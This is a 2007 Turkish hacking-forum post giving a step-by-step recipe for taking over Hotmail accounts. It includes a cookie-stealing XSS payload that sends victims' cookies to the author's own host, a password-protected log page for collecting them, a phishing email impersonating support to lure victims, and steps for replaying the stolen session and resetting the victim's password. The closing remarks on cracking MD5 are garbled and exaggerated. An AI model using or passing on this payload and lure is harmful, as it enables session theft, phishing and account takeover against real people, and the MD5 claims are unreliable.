Mail Hack’in en qüzel yöntemlerinden olan hotmail XSS açığını anlatalım..
Öncelikle dosyalarımızı rar’a attığım şekilde kendi hostumuza atıyoruz..Ve bu dosyaları kendi sitemize qöre editliyoruz.. ama ilk önce dosyalar arasında "c.js" var.. bunu not defterinde açın ve ;
i=newImage();i.src= "http://www.volqan.org/portal/sistem/s +">i=newImage();i.src= "http://www.volqan.org/portal/kapkac +">
şu kısmı bulup " voLqan.Org " linkini kendi sitenizin adıyla editleyin ve bu şekilde kaydedin.. Daha sonra tüm dosyaları rar’ladığım şekilde hostunuza atın.. Detaya inmek istiyorum dosyanın içinde log.php dosyasını yani portal/system/log.php’yi kendinize qöre editleyebilirisiniz.. Mesela orda snif’ten cookie bilqilerini almak için kullanıcı adı ve şifre " admin - voLqan " şeklinde.. Yani ;
$kullaniciadi = "admin";
$sifre = "voLqan";
bunu kendinize qöre uyarlayabilirsiniz.. Böylece cookie’leri aldığınız log sayfası yalnızca size ait olur ve her qirişte " kullanıcı adı - şifre " ister..
Bu dosyamızı da kendimize qöre ayarladıktan sonra sıra qeldi XSS’mizi kullanmaya.. Bu XSS’i kendi sitemde " portal " klasörüne kurduğumu düşünürsem, kurbana yollayacağım link ;
www.volqan.org/portal olacaktır.. Çünkü o klasöre attığım index.html’deki kod yani ;
<script>document.write(’<iframe>http://calendar.msn.com/tasks/isapi.dll?request=action&operation=expandcollapse& objectID=0&itemOldStatus=0&httpFrom=“><53><2F>" height="1" width="1" border="0" frameborder="0" marginwidth="1" marginheight="1" style="position: absolute; left: 0; top: 0"> hi</iframe>’)
window.status=" "
</script>
bu kod kurban’ın bu sayfayı qörmesi halinde cookie bilqilerinin elime qeçmesini sağlayacaktır..
kurbanımı seçiyorum ve ona kendi mail hesabımdan şöyle bir mail qönderiyorum..
Konu : yeni portal nasıl olmuş
Kimden :
support@voLqan.OrgKonu : merhaba arkadaşım voLqan.Org’a qüzel bir portal kurdum seninde yorumlarını bekliyorum..
www.volqan.org/portal Sağ alt taraftaki kategoriye iyi baq
seninde adın qeciyor.. Teşekkürler..
qibisinden kurbana mailimi yolluyorum
Kurbanımız bu iletiyi alıp verdiğim linke qirdiği anda yani hotmail box’ı açık iken
www.volqan.org/portal kısmına qirdiği anda Cookie’leri bizim log’umuzda beliriyor
ve bende hemen
www.voLqan.Org/portal/sistem/log.php? adresime qidip cookie’leri kontrol ediyorum..
ve son olarak proxy ayarlarını yaptıktan sonra aldığımız cookie ile
hotmail.msn.com/cgi-bin/hmhome?fti=yes">http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes
linkinden kurbanın mailine qiriş yapıyoruz..Şifreyi kendimize qöre ayarlamak içinde
www.passport.com dan şifre resetleme linkini yolluyoruz ve mail box açıkken şifreyi resetleyip kendimize qöre ayarlıyoruz..
Proxomitron Download
hotmail XSS Dosyaları Download
işte hotmail XSS mevzusu bundan ibaret.
not:bu iş brute force yapan yok wordlist kullanarak şifre kırmaya yarayan cocuk oyuncagı pogramlarla olmaz
Msn , Hotmaıl gıbı hesap şifrelerimiz Md5 denilen bir şifreleme ile korunuyor !
Bu accountların ( Hesapların ) korundukları Md5 Şifreleri Örneğin böyle gozukur 5c8323d8c60bb34c3fc3841f5c1321c8adCh2259Yk58ax87as
Tabi bunu salladım Ama bunlara benzer goruntudedırler .
Bu çok zor ve karısık gorunen kodları kırdıgınız anda size şifreyi verecektir .. Peki bu nasıl yapılır
Bunu yapmak ıcın iyi bir Coder ( Kod yazan / okuyabılen kısi ) olmanız lazım ..
Ehh yinede Ben Bilmem dersenız Md5 Crack , Md5 Cracker programları vardı bır ara . Ararsanız yıne
bulabılırsınız . Bu programlarla da kırılır..
Not : ***Md5 olayını iyi kaynaklar bulup inceleyin arastırın Çünkü bu olayı çözen bir kişi 10 sanıyede ıstedıgı bır sıte yada
foruma whois cekerek Servarını bulup Md5 hash ını cekerek hackleyebılır
not:maili hacklenenler tıklasın>>>http://www.zaman.com.tr/webapp-tr/ha...haberno=482388
__________________
işte alemin devi
#include
int main()
{
int dr.dagger=0;
printf(’’Hepimiz afilli’yiz, hepimiz ChayLaq’’);
return dr.dagger;
}
Perş. Ağus. 30, 2007 6:09 am